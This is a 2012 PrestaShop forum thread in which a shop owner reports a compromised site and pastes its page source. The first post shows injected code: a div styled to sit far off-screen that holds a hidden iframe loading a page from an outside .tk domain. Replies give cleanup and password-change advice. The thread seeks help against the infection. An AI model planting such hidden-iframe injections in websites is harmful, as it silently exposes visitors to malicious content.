boylibre Posted July 17, 2012 Share Posted July 17, 2012 I have got this script injected into my site and now my site is blocked by Google. Please help me how to get rid of it. I'm using PS 1.3.2. I have to put my site under maintenance now. I can't find any files that are recently modified except those inside smarty/compile folder. I tried to delete but everytime I put my site back up, there are always another set of new files created few minutes later. TIA, boy <link rel="icon" type="image/vnd.microsoft.icon" href="http://www.lens-page.com/img/favicon.ico" /> <link rel="shortcut icon" type="image/x-icon" href="http://www.lens-page.com/img/favicon.ico" /> <link href="/themes/prestashop/css/global.css" rel="stylesheet" type="text/css" media="all" /> <script type="text/javascript" src="http://www.lens-page.com/js/tools.js"></script> <style>.lpv9tbu6 { position:absolute; left:-1864px; top:-1162px} </style> <div class="lpv9tbu6"><iframe src="http://hipdiaewew.tk/46964443.html" width="209" height="351"></iframe></div> <script type="text/javascript"> var baseDir = 'http://www.lens-page.com/'; var static_token = 'ca8f837ddd2863e561d8ab7de9d1146f'; var token = 'b4f125c07e97fe640e54a39991e73e79'; var priceDisplayPrecision = 2; var roundMode = 2; </script> Link to comment Share on other sites More sharing options...
boylibre Posted July 17, 2012 Author Share Posted July 17, 2012 the injected script are on line 5 and 6 Link to comment Share on other sites More sharing options...
Carl Favre Posted July 17, 2012 Share Posted July 17, 2012 Hi boylibre, You were able to remove all the infected files? Link to comment Share on other sites More sharing options...
boylibre Posted July 17, 2012 Author Share Posted July 17, 2012 I'm still monitoring Carl. I just did this and hopefully it solves it http://www.prestashop.com/forums/forum-6/announcement-39-read-carefully-security-procedure-php-cgi/ Link to comment Share on other sites More sharing options...
boylibre Posted July 17, 2012 Author Share Posted July 17, 2012 The malware script is back again.... Link to comment Share on other sites More sharing options...
Carl Favre Posted July 17, 2012 Share Posted July 17, 2012 You should think about upgrading as you have quite an old version of PrestaShop. Have you checked all the files? Can you search for the iframe tag in all your files to be sure nothing is left? Link to comment Share on other sites More sharing options...
Mike Kranzler Posted July 17, 2012 Share Posted July 17, 2012 Hi boylibre, In addition to what Carl said, please change your FTP and database passwords immediately. For these sorts of issues, those are usually the points of entry, so its important to sever the connection as soon as possible. -Mike Link to comment Share on other sites More sharing options...
boylibre Posted July 18, 2012 Author Share Posted July 18, 2012 Thanks Mike, and yes I have changed all of the passwords, cpanel, ftp, database, and all of my employee's passwords. So far I managed to restore it and it seems that the Malware is gone for now. I'm planning for upgrade now. Thanks everyone. ~Boy Link to comment Share on other sites More sharing options...
Mike Kranzler Posted July 18, 2012 Share Posted July 18, 2012 We're glad we could help! Happy selling! -Mike Link to comment Share on other sites More sharing options...
Recommended Posts